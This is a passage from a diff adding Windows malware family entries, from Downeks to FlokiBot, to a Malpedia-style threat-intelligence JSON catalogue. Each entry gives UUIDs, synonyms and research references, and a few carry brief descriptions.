"https://malpedia.caad.fkie.fraunhofer.de/details/win.downeks", + "http://researchcenter.paloaltonetworks.com/2017/01/unit42-downeks-and-quasar-rat-used-in-recent-targeted-attacks-against-governments/?adbsc=social69739136&adbid=826218465723756545&adbpl=tw&adbpr=4487645412" + ] + }, + "uuid": "c8149b45-7d28-421e-bc6f-25c4b8698b92", + "value": "Downeks", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.downpaper", + "http://www.clearskysec.com/charmingkitten/" + ] + }, + "uuid": "227862fd-ae83-4e3d-bb69-cc1a45a13aed", + "value": "DownPaper", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.dramnudge" + ] + }, + "uuid": "627a044b-1c84-409c-9f58-95b46d5d51ba", + "value": "DramNudge", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.dreambot", + "https://lokalhost.pl/gozi_tree.txt", + "https://www.proofpoint.com/us/threat-insight/post/ursnif-variant-dreambot-adds-tor-functionality" + ] + }, + "uuid": "ac4fbbb0-9a21-49ce-be82-e44cb02a7819", + "value": "DreamBot", + "description": "2010 Gozi v2.0, Gozi ISFB, ISFB, Pandemyia(*)\r\n2014 Dreambot (Gozi ISFB variant)\r\n\r\nIn 2014, a variant of Gozi ISFB was developed. Mainly, the dropper performs additional anti-vm checks (vmware, vbox, qemu), while the actual bot-dll remains unchanged in most parts. New functionality, such as TOR support, was added though and often, the Fluxxy fast-flux network is used.\r\n\r\nSee win.gozi for additional historical information." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.dridex", + "https://securelist.com/analysis/publications/78531/dridex-a-history-of-evolution/", + "https://blogs.it.ox.ac.uk/oxcert/2015/11/09/major-dridex-banking-malware-outbreak/", + "https://securityintelligence.com/dridexs-cold-war-enter-atombombing/", + "https://www.blueliv.com/downloads/documentation/reports/Network_insights_of_Dyre_and_Dridex_Trojan_bankers.pdf", + "https://www.govcert.admin.ch/blog/28/the-rise-of-dridex-and-the-role-of-esps", + "https://www.cert.pl/en/news/single/talking-dridex-part-0-inside-the-dropper/", + "https://viql.github.io/dridex/", + "https://www.flashpoint-intel.com/blog-dridex-banking-trojan-returns/", + "https://www.welivesecurity.com/2018/01/26/friedex-bitpaymer-ransomware-work-dridex-authors/" + ] + }, + "uuid": "b4216929-1626-4444-bdd7-bfd4b68a766e", + "value": "Dridex", + "description": "OxCERT blog describes Dridex as \"an evasive, information-stealing malware variant; its goal is to acquire as many credentials as possible and return them via an encrypted tunnel to a Command-and-Control (C&C) server. These C&C servers are numerous and scattered all over the Internet, if the malware cannot reach one server it will try another. For this reason, network-based measures such as blocking the C&C IPs is effective only in the short-term.\"\r\nAccording to MalwareBytes, \"Dridex uses an older tactic of infection by attaching a Word document that utilizes macros to install malware. However, once new versions of Microsoft Office came out and users generally updated, such a threat subsided because it was no longer simple to infect a user with this method.\"\r\nIBM X-Force discovered \"a new version of the Dridex banking Trojan that takes advantage of a code injection technique called AtomBombing to infect systems. AtomBombing is a technique for injecting malicious code into the 'atom tables' that almost all versions of Windows uses to store certain application data. It is a variation of typical code injection attacks that take advantage of input validation errors to insert and to execute malicious code in a legitimate process or application. Dridex v4 is the first malware that uses the AtomBombing process to try and infect systems.\"" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.dropshot", + "https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html", + "https://www.megabeets.net/decrypting-dropshot-with-radare2-and-cutter-part-1/", + "https://www.megabeets.net/decrypting-dropshot-with-radare2-and-cutter-part-2/" + ] + }, + "uuid": "cfdb02f2-a767-4abb-b04c-333a02cdd7e2", + "value": "DROPSHOT", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.dtbackdoor" + ] + }, + "uuid": "cc5abb0c-7f33-4a82-a92e-0070fd602ba5", + "value": "DtBackdoor", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.dualtoy", + "https://researchcenter.paloaltonetworks.com/2016/09/dualtoy-new-windows-trojan-sideloads-risky-apps-to-android-and-ios-devices/" + ] + }, + "uuid": "8269e779-db23-4c94-aafb-36ee94879417", + "value": "DualToy", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.dubnium_darkhotel", + "https://blogs.technet.microsoft.com/mmpc/2016/06/09/reverse-engineering-dubnium-2/3/", + "http://blog.jpcert.or.jp/2016/06/asruex-malware-infecting-through-shortcut-files.html", + "https://securelist.com/blog/research/71713/darkhotels-attacks-in-2015/", + "https://labs.bitdefender.com/wp-content/uploads/downloads/inexsmar-an-unusual-darkhotel-campaign/" + ] + }, + "uuid": "309d0745-bbfd-43bc-b2c4-511592a475bf", + "value": "DarkHotel", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.dubrute", + "https://github.com/ch0sys/DUBrute" + ] + }, + "uuid": "2236a08f-dfbd-4f92-9d73-a895c34766ad", + "value": "DUBrute", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.dumador" + ] + }, + "uuid": "ea59906d-b5e1-4749-8494-9ad9a09510b5", + "value": "Dumador", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.duqu", + "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/w32_duqu_the_precursor_to_the_next_stuxnet_research.pdf" + ] + }, + "uuid": "7344cee0-87c9-46a1-85aa-0d3c8c9c8cc6", + "value": "DuQu", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.duuzer", + "https://www.symantec.com/connect/blogs/wannacry-ransomware-attacks-show-strong-links-lazarus-group" + ] + }, + "uuid": "a5eb921e-17db-46de-a907-09f9ad05a7d7", + "value": "Duuzer", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Dyreza" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.dyre", + "https://blog.malwarebytes.com/threat-analysis/2015/11/a-technical-look-at-dyreza/", + "https://www.forbes.com/sites/thomasbrewster/2017/05/04/dyre-hackers-stealing-millions-from-american-coporates", + "https://www.blueliv.com/downloads/documentation/reports/Network_insights_of_Dyre_and_Dridex_Trojan_bankers.pdf" + ] + }, + "uuid": "1ecbcd20-f238-47ef-874b-08ef93266395", + "value": "Dyre", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.eda2_ransom", + "https://twitter.com/JaromirHorejsi/status/815861135882780673" + ] + }, + "uuid": "24fe5fef-6325-4c21-9c35-a0ecd185e254", + "value": "EDA2", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.ehdevel", + "https://labs.bitdefender.com/2017/09/ehdevel-the-story-of-a-continuously-improving-advanced-threat-creation-toolkit/" + ] + }, + "uuid": "257da597-7e6d-4405-9b10-b4206bb013ca", + "value": "EHDevel", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.elirks", + "https://researchcenter.paloaltonetworks.com/2016/09/mile-tea-cyber-espionage-campaign-targets-asia-pacific-businesses-and-government-agencies/" + ] + }, + "uuid": "eb189fd3-ca39-4bc7-be2d-4ea9e89d9ab9", + "value": "Elirks", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.elise", + "https://securelist.com/blog/research/70726/the-spring-dragon-apt/", + "https://www.accenture.com/t20180127T003755Z__w__/us-en/_acnmedia/PDF-46/Accenture-Security-Dragonfish-Threat-Analysis.pdf", + "https://researchcenter.paloaltonetworks.com/2016/02/emissary-trojan-changelog-did-operation-lotus-blossom-cause-it-to-evolve/", + "https://www.joesecurity.org/blog/8409877569366580427" + ] + }, + "uuid": "3477a25d-e04b-475e-8330-39f66c10cc01", + "value": "Elise", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.emdivi", + "http://blog.trendmicro.com/trendlabs-security-intelligence/attackers-target-organizations-in-japan-transform-local-sites-into-cc-servers-for-emdivi-backdoor/", + "http://blog.trendmicro.com/trendlabs-security-intelligence/chessmaster-cyber-espionage-campaign/", + "https://securelist.com/new-activity-of-the-blue-termite-apt/71876/", + "http://blog.jpcert.or.jp/2015/11/decrypting-strings-in-emdivi.html" + ] + }, + "uuid": "6bf7aa6a-3003-4222-805e-776cb86dc78a", + "value": "Emdivi", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.empire_downloader", + "https://twitter.com/thor_scanner/status/992036762515050496" + ] + }, + "uuid": "aa445513-9616-4f61-a72d-7aff4a10572b", + "value": "Empire Downloader", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Lurid" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.enfal", + "https://www.bsk-consulting.de/2015/10/17/how-to-write-simple-but-sound-yara-rules-part-2/", + "http://la.trendmicro.com/media/misc/lurid-downloader-enfal-report-en.pdf", + "https://researchcenter.paloaltonetworks.com/2015/05/cmstar-downloader-lurid-and-enfals-new-cousin/" + ] + }, + "uuid": "2a4cacb7-80a1-417e-8b9c-54b4089f35d9", + "value": "Enfal", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.equationdrug", + "http://artemonsecurity.blogspot.com/2017/03/equationdrug-rootkit-analysis-mstcp32sys.html", + "https://securelist.com/equation-the-death-star-of-malware-galaxy/68750/", + "https://securelist.com/inside-the-equationdrug-espionage-platform/69203/", + "https://cdn.securelist.com/files/2015/02/Equation_group_questions_and_answers.pdf" + ] + }, + "uuid": "c4490972-3403-4043-9d61-899c0a440940", + "value": "EquationDrug", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.equationgroup", + "https://laanwj.github.io/2016/09/23/seconddate-adventures.html", + "https://laanwj.github.io/2016/09/17/seconddate-cnc.html", + "https://laanwj.github.io/2016/09/13/blatsting-rsa.html", + "https://laanwj.github.io/2016/09/11/buzzdirection.html", + "https://laanwj.github.io/2016/09/09/blatsting-lp-transcript.html", + "https://laanwj.github.io/2016/09/04/blatsting-command-and-control.html", + "https://laanwj.github.io/2016/09/01/tadaqueos.html", + "https://laanwj.github.io/2016/08/28/feintcloud.html", + "https://laanwj.github.io/2016/08/22/blatsting.html" + ] + }, + "uuid": "35c1abaf-8dee-48fe-8329-f6e5612eb7af", + "value": "Equationgroup (Sorting)", + "description": "Rough collection EQGRP samples, to be sorted" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.erebus", + "https://www.bleepingcomputer.com/news/security/erebus-ransomware-utilizes-a-uac-bypass-and-request-a-90-ransom-payment/" + ] + }, + "uuid": "479353aa-c6d7-47a7-b5f0-3f97fd904864", + "value": "Erebus", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.eredel", + "https://webcache.googleusercontent.com/search?q=cache:3hU62-Lr2t8J:hXXps://www.nulled.to/topic/486274-eredel-stealer-lite-private-having-control-via-the-web-panel-multifunctional-stealer/+&cd=1&hl=en&ct=clnk&gl=ch&client=firefox-b-ab" + ] + }, + "uuid": "acd2555d-b4a1-47b4-983a-fb7b3a402dab", + "value": "Eredel", + "description": "Eredel Stealer is a low price malware that allows for extracting passwords, cookies, screen desktop from browsers and programs.\r\n\r\nAccording to nulled[.]to:\r\n\r\nSupported browsers\r\nChromium Based: Chromium, Google Chrome, Kometa, Amigo, Torch, Orbitum, Opera, Opera Neon, Comodo Dragon, Nichrome (Rambler), Yandex Browser, Maxthon5, Sputnik, Epic Privacy Browser, Vivaldi, CocCoc and other Chromium Based browsers.\r\n\r\n- Stealing FileZilla\r\n- Stealing an account from Telegram\r\n- Stealing AutoFill\r\n- Theft of wallets: Bitcoin | Dash | Monero | Electrum | Ethereum | Litecoin\r\n- Stealing files from the desktop. Supports any formats, configurable via telegram-bot" + }, + { + "meta": { + "synonyms": [ + "ExPetr", + "Pnyetya", + "Petna", + "NotPetya", + "Nyetya", + "NonPetya", + "nPetya", + "Diskcoder.C", + "BadRabbit" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.eternal_petya", + "https://securelist.com/schroedingers-petya/78870/", + "https://securelist.com/expetrpetyanotpetya-is-a-wiper-not-ransomware/78902/", + "https://securelist.com/from-blackenergy-to-expetr/78937/", + "https://medium.com/@thegrugq/pnyetya-yet-another-ransomware-outbreak-59afd1ee89d4", + "https://tisiphone.net/2017/06/28/why-notpetya-kept-me-awake-you-should-worry-too/", + "https://labsblog.f-secure.com/2017/06/29/petya-i-want-to-believe/", + "http://blog.erratasec.com/2017/06/nonpetya-no-evidence-it-was-smokescreen.html", + "https://blog.comae.io/petya-2017-is-a-wiper-not-a-ransomware-9ea1d8961d3b", + "https://blog.malwarebytes.com/threat-analysis/2017/06/eternalpetya-lost-salsa20-key/", + "https://www.bleepingcomputer.com/news/security/ransomware-attacks-continue-in-ukraine-with-mysterious-wannacry-clone/", + "http://blog.talosintelligence.com/2017/06/worldwide-ransomware-variant.html", + "https://labsblog.f-secure.com/2017/06/30/eternal-petya-from-a-developers-perspective/", + "https://www.welivesecurity.com/2017/06/30/telebots-back-supply-chain-attacks-against-ukraine/", + "https://isc.sans.edu/forums/diary/Checking+out+the+new+Petya+variant/22562/", + "https://blog.malwarebytes.com/threat-analysis/2017/06/eternalpetya-yet-another-stolen-piece-package/", + "https://blogs.technet.microsoft.com/mmpc/2017/06/29/windows-10-platform-resilience-against-the-petya-ransomware-attack/", + "https://www.gdatasoftware.com/blog/2017/07/29859-who-is-behind-petna", + "https://www.crowdstrike.com/blog/fast-spreading-petrwrap-ransomware-attack-combines-eternalblue-exploit-credential-stealing/", + "https://www.crowdstrike.com/blog/petrwrap-technical-analysis-part-2-further-findings-and-potential-for-mbr-recovery/", + "https://www.theguardian.com/technology/2017/jul/03/notpetya-malware-attacks-ukraine-warrant-retaliation-nato-researcher-tomas-minarik", + "https://blog.malwarebytes.com/cybercrime/2017/07/keeping-up-with-the-petyas-demystifying-the-malware-family/", + "https://threatpost.com/ukrainian-man-arrested-charged-in-notpetya-distribution/127391/", + "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2017/september/eternalglue-part-one-rebuilding-notpetya-to-assess-real-world-resilience/", + "https://www.welivesecurity.com/2017/10/24/kiev-metro-hit-new-variant-infamous-diskcoder-ransomware/?utm_content=buffer8ffe4&utm_medium=social&utm_source=twitter.com&utm_campaign=buffer", + "https://securelist.com/bad-rabbit-ransomware/82851/", + "https://www.wired.com/story/badrabbit-ransomware-notpetya-russia-ukraine/", + "https://www.welivesecurity.com/2017/10/24/bad-rabbit-not-petya-back/", + "http://blog.talosintelligence.com/2017/10/bad-rabbit.html", + "http://www.intezer.com/notpetya-returns-bad-rabbit/", + "https://www.riskiq.com/blog/labs/badrabbit/", + "https://www.fireeye.com/blog/threat-research/2017/10/backswing-pulling-a-badrabbit-out-of-a-hat.html", + "https://labsblog.f-secure.com/2017/10/27/the-big-difference-with-bad-rabbit/", + "https://www.reversinglabs.com/newsroom/news/reversinglabs-yara-rule-detects-badrabbit-encryption-routine-specifics.html", + "https://www.washingtonpost.com/world/national-security/russian-military-was-behind-notpetya-cyberattack-in-ukraine-cia-concludes/2018/01/12/048d8506-f7ca-11e7-b34a-b85626af34ef_story.html" + ] + }, + "uuid": "6f736038-4f74-435b-8904-6870ee0e23ba", + "value": "EternalPetya", + "description": "" + }, + { + "meta": { + "synonyms": [ + "HighTide" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.etumbot", + "https://www.arbornetworks.com/blog/asert/wp-content/uploads/2014/06/ASERT-Threat-Intelligence-Brief-2014-07-Illuminating-Etumbot-APT.pdf", + "https://www.zscaler.com/blogs/research/cnacom-open-source-exploitation-strategic-web-compromise", + "https://www.fireeye.com/blog/threat-research/2014/09/darwins-favorite-apt-group-2.html" + ] + }, + "uuid": "91af1080-6378-4a90-ba1e-78634cd31efe", + "value": "EtumBot", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.evilbunny", + "https://www.gdatasoftware.com/blog/2015/02/24270-babar-espionage-software-finally-found-and-put-under-the-microscope", + "https://www.cyphort.com/evilbunny-malware-instrumented-lua/" + ] + }, + "uuid": "dc39dcdf-50e7-4d55-94a0-926853f344f3", + "value": "Evilbunny", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Vidgrab" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.evilgrab", + "https://www.arbornetworks.com/blog/asert/wp-content/uploads/2016/01/ASERT-Threat-Intelligence-Brief-2015-08-Uncovering-the-Seven-Point-Dagger.pdf" + ] + }, + "uuid": "438c6d0f-03f0-4b49-89d2-40bf5349c3fc", + "value": "EvilGrab", + "description": "" + }, + { + "meta": { + "synonyms": [ + "CREstealer" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.evilpony", + "https://techhelplist.com/spam-list/1104-2017-03-27-your-amazon-com-order-has-shipped-malware", + "https://threatpost.com/docusign-phishing-campaign-includes-hancitor-downloader/125724/", + "https://www.s21sec.com/en/blog/2017/07/ramnit-and-its-pony-module/" + ] + }, + "uuid": "e26579d9-1d93-4a3b-a41e-263254d85189", + "value": "EvilPony", + "description": "Privately modded version of the Pony stealer." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.evrial", + "https://www.bleepingcomputer.com/news/security/evrial-trojan-switches-bitcoin-addresses-copied-to-windows-clipboard/" + ] + }, + "uuid": "af3a3ece-e67f-457a-be72-7651bc720342", + "value": "Evrial", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Sabresac", + "Saber" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.excalibur", + "https://blog.cylance.com/digitally-signed-malware-targeting-gaming-companies" + ] + }, + "uuid": "3cec2c3c-1669-40cf-8612-eb826f7d2c98", + "value": "Excalibur", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.exchange_tool", + "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/", + "https://github.com/nccgroup/Royal_APT" + ] + }, + "uuid": "74f8db32-799c-41e5-9815-6272908ede57", + "value": "MS Exchange Tool", + "description": "" + }, + { + "meta": { + "synonyms": [ + "ExtRat" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.extreme_rat", + "https://www.fireeye.com/blog/threat-research/2014/02/xtremerat-nuisance-or-threat.html", + "https://malware.lu/articles/2012/07/22/xtreme-rat-analysis.html", + "https://community.rsa.com/community/products/netwitness/blog/2017/08/02/malspam-delivers-xtreme-rat-8-1-2017", + "https://www.symantec.com/connect/blogs/colombians-major-target-email-campaigns-delivering-xtreme-rat" + ] + }, + "uuid": "6ec2b6b1-c1a7-463a-b135-edb51764cf38", + "value": "Xtreme RAT", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.eye_pyramid", + "https://securelist.com/blog/incidents/77098/the-eyepyramid-attacks/", + "http://blog.talosintel.com/2017/01/Eye-Pyramid.html" + ] + }, + "uuid": "a7489029-21d4-44c9-850a-8f656a98cb22", + "value": "Eye Pyramid", + "description": "" + }, + { + "meta": { + "synonyms": [ + "WillExec" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.fakedga", + "https://github.com/360netlab/DGA/issues/36", + "http://blog.talosintelligence.com/2017/10/threat-round-up-1020-1017.html", + "http://www.freebuf.com/column/153424.html" + ] + }, + "uuid": "31c248cb-51b5-4bb7-801f-d8520d2b5789", + "value": "FakeDGA", + "description": "According to Talos, this trojan injects into other processes, disables security features and tries to contact several domains, waiting for instruction.\r\n\r\nThere seem to be two versions of this malware: one with the FakeDGA-domains in plaintext, and one with AES-ECB-encrypted domains (using the Windows-API)." + }, + { + "meta": { + "synonyms": [ + "Braviax" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.fakerean", + "https://blog.threattrack.com/fakerean-comes-of-age-turns-hard-core/", + "https://0x3asecurity.wordpress.com/2015/11/30/134260124544/", + "https://www.exploit-db.com/docs/english/18387-malware-reverse-engineering-part-1---static-analysis.pdf", + "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Win32/FakeRean#technicalDiv" + ] + }, + "uuid": "653df134-88c9-47e2-99a5-06e0406ab6d4", + "value": "FakeRean", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.faketc", + "http://www.welivesecurity.com/2015/07/30/operation-potao-express/" + ] + }, + "uuid": "6b0030bc-6e45-43b0-9175-15fe8fbd0942", + "value": "FakeTC", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.fanny", + "https://securelist.com/equation-the-death-star-of-malware-galaxy/68750/#_1" + ] + }, + "uuid": "6d441619-c5f5-45ff-bc63-24cecd0b237e", + "value": "Fanny", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.fantomcrypt", + "https://www.webroot.com/blog/2016/08/29/fantom-ransomware-windows-update/" + ] + }, + "uuid": "29f4ae5a-4ccd-451b-bd3e-d301865da034", + "value": "FantomCrypt", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.fast_pos", + "http://documents.trendmicro.com/assets/fastPOS-quick-and-easy-credit-card-theft.pdf", + "https://blog.trendmicro.com/trendlabs-security-intelligence/fastpos-updates-in-time-for-retail-sale-season/", + "http://documents.trendmicro.com/assets/Appendix%20-%20FastPOS%20Updates%20in%20Time%20for%20the%20Retail%20Sale%20Season.pdf" + ] + }, + "uuid": "1bf03bbb-d3a2-4713-923b-218186c86914", + "value": "FastPOS", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.felismus", + "https://www.symantec.com/connect/blogs/sowbug-cyber-espionage-group-targets-south-american-and-southeast-asian-governments" + ] + }, + "uuid": "07a41ea7-17b2-4852-bfd7-54211c477dc0", + "value": "Felismus", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.felixroot", + "https://medium.com/@Sebdraven/when-a-malware-is-more-complex-than-the-paper-5822fc7ff257", + "https://www.fireeye.com/blog/threat-research/2018/07/microsoft-office-vulnerabilities-used-to-distribute-felixroot-backdoor.html" + ] + }, + "uuid": "e58755ac-3d0c-4ed3-afeb-e929816c8018", + "value": "Felixroot", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Cridex", + "Bugat" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.feodo", + "http://contagiodump.blogspot.com/2012/08/cridex-analysis-using-volatility-by.html", + "https://feodotracker.abuse.ch/", + "https://securelist.com/analysis/publications/78531/dridex-a-history-of-evolution/", + "http://www.sempersecurus.org/2012/08/cridex-analysis-using-volatility.html" + ] + }, + "uuid": "66781866-f064-467d-925d-5e5f290352f0", + "value": "Feodo", + "description": "Feodo (also known as Cridex or Bugat) is a Trojan used to commit e-banking fraud and to steal sensitive information from the victims computer, such as credit card details or credentials." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.ff_rat", + "https://www.cylance.com/en_us/blog/breaking-down-ff-rat-malware.html" + ] + }, + "uuid": "e701b875-8ade-434f-89ff-6c367099bfd8", + "value": "FF RAT", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.fileice_ransom", + "https://www.bleepingcomputer.com/news/security/in-dev-ransomware-forces-you-do-to-survey-before-unlocking-computer/" + ] + }, + "uuid": "ed0b8ac9-973b-4aaa-9904-8c7ed2e73933", + "value": "FileIce", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Poseidon" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.findpos", + "https://researchcenter.paloaltonetworks.com/2015/03/findpos-new-pos-malware-family-discovered/", + "https://blogs.cisco.com/security/talos/poseidon" + ] + }, + "uuid": "ae914b9a-67a2-425d-bef0-3a9624a207ba", + "value": "FindPOS", + "description": "" + }, + { + "meta": { + "synonyms": [ + "FinSpy" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.finfisher", + "https://artemonsecurity.blogspot.de/2017/01/finfisher-rootkit-analysis.html", + "https://www.fireeye.com/blog/threat-research/2017/09/zero-day-used-to-distribute-finspy.html", + "https://www.welivesecurity.com/2017/09/21/new-finfisher-surveillance-campaigns/", + "https://securelist.com/blackoasis-apt-and-new-targeted-attacks-leveraging-zero-day-exploit/82732/", + "http://www.msreverseengineering.com/blog/2018/1/23/a-walk-through-tutorial-with-code-on-statically-unpacking-the-finspy-vm-part-one-x86-deobfuscation", + "https://www.welivesecurity.com/wp-content/uploads/2018/01/WP-FinFisher.pdf", + "https://cloudblogs.microsoft.com/microsoftsecure/2018/03/01/finfisher-exposed-a-researchers-tale-of-defeating-traps-tricks-and-complex-virtual-machines/" + ] + }, + "uuid": "541b64bc-87ec-4cc2-aaee-329355987853", + "value": "FinFisher RAT", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.fireball", + "http://blog.checkpoint.com/2017/06/01/fireball-chinese-malware-250-million-infection/" + ] + }, + "uuid": "9ad28356-184c-4f02-89f5-1b70981598c3", + "value": "Fireball", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.firecrypt", + "https://www.bleepingcomputer.com/news/security/firecrypt-ransomware-comes-with-a-ddos-component/" + ] + }, + "uuid": "c4346ed0-1d74-4476-a78c-299bce0409bd", + "value": "FireCrypt", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.firemalv", + "https://blog.checkpoint.com/wp-content/uploads/2015/11/rocket-kitten-report.pdf" + ] + }, + "uuid": "9715c6bc-4b1e-49a2-b1d8-db4f4c4f042c", + "value": "FireMalv", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.first_ransom", + "https://twitter.com/JaromirHorejsi/status/815949909648150528" + ] + }, + "uuid": "1ab17959-6254-49af-af26-d34e87073e49", + "value": "FirstRansom", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.flawedammyy", + "https://github.com/Coldzer0/Ammyy-v3", + "https://secrary.com/ReversingMalware/AMMY_RAT_Downloader/", + "https://www.proofpoint.com/us/threat-insight/post/leaked-source-code-ammyy-admin-turned-flawedammyy-rat", + "https://www.proofpoint.com/us/threat-insight/post/ta505-abusing-settingcontent-ms-within-pdf-files-distribute-flawedammyy-rat" + ] + }, + "uuid": "18419355-fd28-41a6-bffe-2df68a7166c4", + "value": "FlawedAmmyy", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.flexispy", + "https://www.randhome.io/blog/2017/04/23/lets-talk-about-flexispy/" + ] + }, + "uuid": "4305d59a-0d07-4021-a902-e7996378898b", + "value": "FlexiSpy", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.floki_bot", + "http://blog.talosintel.com/2016/12/flokibot-collab.html#more", + "https://www.cylance.com/en_us/blog/threat-spotlight-flokibot-pos-malware.html", + "https://blog.malwarebytes.com/threat-analysis/2016/11/floki-bot-and-the-stealthy-dropper/", + "http://adelmas.com/blog/flokibot.php", + 